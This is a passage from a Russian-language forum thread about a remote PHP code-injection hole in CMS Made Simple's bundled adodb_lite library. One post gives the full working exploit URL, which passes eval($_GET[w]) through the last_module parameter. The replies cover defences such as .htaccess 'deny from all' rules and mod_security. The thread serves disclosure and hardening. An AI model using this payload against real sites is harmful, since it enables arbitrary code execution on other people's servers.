Использую cmsmadesimple на многих сайтах.
Давеча получил по аське от доброго человека сообщение:
"Привет,
http://www.мой_сайт.ru//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
дыра позволяет выполнить любой php код"
Похоже на пхп-инъекцию. Проверил - работает.
Warning ! Topic is solved
Re: Warning !
Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
unsigned double ZYV;
Re: Warning !
Imho, было бы правильней, если бы разработчики его туда сами поместили. А то, мало ли какие грабли потом вылезут.ZYV wrote: Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Re: Warning !
Т.е. просто создать файлик с этой строчкой "deny from all"?ZYV wrote: Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Re: Warning !
Да, я согласен, но у меня не было времени побеседовать с Тедом на тему безопасности. Очень с ним вообще тяжело в последнее время (временем).
Нет, Илья, если просто кинешь - нарушишь работу некоторых функций (увидишь сам). Я кладу что-то в стиле
Нет, Илья, если просто кинешь - нарушишь работу некоторых функций (увидишь сам). Я кладу что-то в стиле
Но, конечно, во-первых, список может быть расширен, во-вторых, во все папки где доступ не нужен вообще типа plug-ins - просто deny from all для всех. Кстати, сильно помогает против лошков. Но я вообще в этом плане параноик - у меня mod_security & ids'ы везде крутятся... На всякий.
order allow,deny
deny from all
unsigned double ZYV;